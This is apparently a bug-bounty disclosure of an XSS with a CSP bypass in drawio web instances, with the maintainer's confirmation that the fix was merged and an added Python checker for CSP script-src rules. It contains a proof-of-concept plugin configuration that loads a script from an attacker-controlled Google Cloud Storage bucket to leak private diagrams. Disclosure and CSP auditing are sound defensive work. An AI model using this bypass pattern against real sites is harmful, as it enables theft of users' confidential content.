XSS with CSP bypass on WEB instances in jgraph/drawio

Valid

Reported on Sep 5th 2022


📝 Description

Drawio WEB instances allow https://storage.googleapis.com in the CSP script-src directive. By abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.

🕵️‍♂️ Proof of Concept

On the web application side, JavaScript execution is restricted by the following CSP script-src directive:

...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...

Because the policy allows scripts to be loaded from https://storage.googleapis.com, the public hostname shared by all Google Cloud Storage buckets, it is possible to use a bucket there to execute our code.

{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}

[Screenshot: xss_web.png]
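As an added example (not the reporter's or the drawio project's code), the script below applies CSP host-source matching to the report's script-src directive (truncated to one hash) to show why the PoC URL passes, and what happens once the storage.googleapis.com entry is removed, as the maintainer did. It assumes the page origin is https://app.diagrams.net and uses a constructed SHARED_HOSTING set.

```python
# Added example, not from the report or the drawio project: checks which script
# URLs a script-src directive admits, using CSP host-source matching. Assumed:
# the page origin is https://app.diagrams.net; SHARED_HOSTING is a constructed set.
from urllib.parse import urlsplit

# hosts serving arbitrary user-uploaded files; allowing the bare host is risky
SHARED_HOSTING = {"storage.googleapis.com"}

POLICY = ("script-src https://www.dropbox.com https://api.trello.com 'self' "
          "https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com "
          "https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes='")

def parse_script_src(policy):
    """Return the source expressions of the script-src directive, or []."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "script-src":
            return tokens[1:]
    return []

def _as_url(source):
    # a bare host source ("example.com") inherits the page scheme; assume https
    return urlsplit(source if "://" in source else "https://" + source)

def host_source_matches(source, url):
    """CSP host-source matching: scheme, host (optional '*.' wildcard) and path."""
    src, tgt = _as_url(source), urlsplit(url)
    host_ok = (tgt.hostname.endswith(src.hostname[1:]) if src.hostname.startswith("*.")
               else tgt.hostname == src.hostname)
    if src.scheme != tgt.scheme or not host_ok:
        return False
    if not src.path:
        return True  # no path: every script on the host is allowed
    if src.path.endswith("/"):
        return tgt.path.startswith(src.path)  # directory prefix match
    return tgt.path == src.path  # exact file match

def script_allowed(policy, url, page_origin="https://app.diagrams.net"):
    """Would <script src=url> load under policy? Hash/nonce sources never match a URL."""
    for source in parse_script_src(policy):
        if source == "'self'":
            if host_source_matches(page_origin, url):
                return True
        elif not source.startswith("'") and host_source_matches(source, url):
            return True
    return False

def risky_sources(policy):
    """Sources granting a whole shared-hosting host instead of one bucket path."""
    return [s for s in parse_script_src(policy) if not s.startswith("'")
            and _as_url(s).hostname in SHARED_HOSTING and _as_url(s).path in ("", "/")]
```

A path-scoped source such as https://storage.googleapis.com/<your-bucket>/ would also have rejected the PoC URL while still permitting scripts from that one bucket.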

Impact

An attacker could use it to access any user's confidential content.

David Benson validated this vulnerability 18 days ago
Mizu has been awarded the disclosure bounty
David Benson confirmed that a fix has been merged on 59887e 18 days ago
David Benson (Maintainer), 18 days ago:

Thanks for the report, the entry has been removed from the CSP.
